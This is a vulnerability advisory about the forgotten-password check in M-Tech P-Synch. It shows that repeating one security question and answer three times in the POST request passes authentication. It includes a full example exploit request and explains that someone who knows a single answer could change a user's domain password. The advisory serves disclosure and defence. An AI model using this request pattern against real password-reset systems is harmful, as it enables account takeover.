Security Advisory 06 – 003 – P-Synch permits reduced authentication complexity in Forgotton Password mechanism
M-Tech P-Synch Password Management Software
Vulnerability discovery and development:
Portcullis Security Testing Services discovered this vulnerability.
The vulnerability was found and verified against a system running on a Windows 2000 platform.
It was noted that, in addition to the application failing to check that the supplied POST request corresponds to the questions presented to the user, it was possible to supply three instances of the same question and answer pair. Assuming that the presented answer is correct, the application authenticates the user successfully.
An example POST is detailed below:
POST /nph-psf.exe HTTP/1.1 Host: 192.168.1.1 Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://192.168.1.1/nph-psf.exe Content-Type: application/x-www-form-urlencoded Content-Length: 259 TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484&_VALUE_1=2&_QUES_1=QD-42ae7b35-02484&_VALUE_2=2&_QUES_2=QD-42ae7b35-02484&SUBMIT-QA.x=45&SUBMIT-QA.y=8
In conjunction with the discovery that the app fails to track which questions have been asked, it is possible for a malicious user who knows the answer to only one of the security questions associated with the target user to authenticate to the P-synch application and modify the target users’ domain password.
Notified via email 17 February 2006